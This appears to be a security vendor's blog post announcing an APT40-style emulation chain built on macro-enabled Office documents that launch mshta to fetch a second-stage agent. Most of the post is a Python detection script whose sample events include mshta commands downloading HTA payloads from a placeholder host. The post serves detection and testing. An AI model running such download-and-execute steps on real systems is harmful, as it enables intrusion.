For this week's TTP Tuesday we are releasing a new APT40 themed chain based on multi-stage macro-enabled Office documents. These documents use LOLBins (living-off-the-land binaries) to download and execute secondary malware. CISA released multiple advisories on APT40 targeting the defense industry in 2017.
This chain stages and executes Office documents that contain VBA scripts to run MShta. The HTA file includes a script to download and execute a secondary Pneuma agent on the compromised host. To get started, configure your range with the required Operator network facts, such as public IP and agent port.
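The stage worth watching for on the defensive side is the one the chain hinges on: an Office process spawning mshta.exe, typically with a remote URL on its command line. The following detection sketch is an added example, not Prelude code and not part of the chain release; it runs over constructed process-creation events in a simplified key=value format with Sysmon-style field names (ParentImage, Image, CommandLine) that are an assumption here, so real telemetry has to be mapped to those fields first.

```python
"""Flag the Office -> mshta.exe stage of a macro-based LOLBin chain.

Added example (not Prelude code). The event format below is a constructed,
simplified rendering of process-creation telemetry; field names follow Sysmon
Event ID 1 conventions by assumption.
"""
import re
from typing import Dict, List

# Office hosts that should rarely, if ever, spawn script engines or LOLBins.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script/LOLBin children commonly used as the next stage; mshta.exe is the one
# named in this release, the others are close relatives worth the same rule.
SUSPICIOUS_CHILDREN = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# key=value pairs; values with spaces are double-quoted in this format.
KV_PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample events (not real telemetry); example.invalid is a
# reserved placeholder domain.
SAMPLE_EVENTS = [
    'EventId=1 ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe http://example.invalid/stage2.hta"',
    'EventId=1 ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe C:\\Users\\u\\Desktop\\help.hta"',
    'EventId=1 ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" '
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe"',
    'EventId=1 ParentImage=C:\\Windows\\System32\\cmd.exe '
    'Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta.exe https://example.invalid/x.hta"',
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict (quoted or bare values)."""
    return {key: quoted or bare for key, quoted, bare in KV_PAIR.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the list of rule names an event matches (empty if benign)."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    reasons = []
    # Rule 1: an Office application directly spawning a script host / LOLBin.
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append("office_spawns_lolbin")
    # Rule 2: mshta.exe pulling its HTA from a remote URL, whatever the parent.
    if child == "mshta.exe" and REMOTE_URL.search(event.get("CommandLine", "")):
        reasons.append("mshta_remote_url")
    return reasons


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Run both rules over event lines; return one hit per matching event."""
    hits = []
    for number, line in enumerate(lines, start=1):
        event = parse_event(line)
        reasons = score_event(event)
        if reasons:
            hits.append({
                "line_no": number,
                "parent": basename(event.get("ParentImage", "")),
                "child": basename(event.get("Image", "")),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"event {hit['line_no']}: {hit['parent']} -> {hit['child']} {hit['reasons']}")
```

On the constructed sample the first event trips both rules (Word spawning mshta.exe with an http URL), the fourth trips only the remote-URL rule, and the local-HTA and notepad events stay quiet. The parent/child rule is the higher-signal one for this chain; the URL rule is broader and will want tuning against legitimate HTA use in the environment.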
There are several ways to follow us and learn more about Prelude and our team members:
GET OUR PRODUCTS
Download Prelude Operator: www.prelude.org/download/current
See the latest kill chain and TTP Releases: chains.prelude.org/
See our open-source repositories: github.com/preludeorg
JOIN OUR COMMUNITY
Discord: discord.gg/gzUv4XNquu
Reddit: www.reddit.com/r/preludeorg/
Twitter: twitter.com/preludeorg
READ, WATCH, AND LISTEN
Listen to our Podcast: anchor.fm/preludeorg
Read our blog: feed.prelude.org/
Watch our live streams: www.twitch.tv/preludeorg
Watch our pre-recorded content: youtube.com/c/preludeorg
FOLLOW OUR TEAM
David: twitter.com/privateducky
Alex: twitter.com/khyberspache
Kris: twitter.com/Xanthonus
Octavia: twitter.com/VV_X_7
Sam: twitter.com/wasupwithuman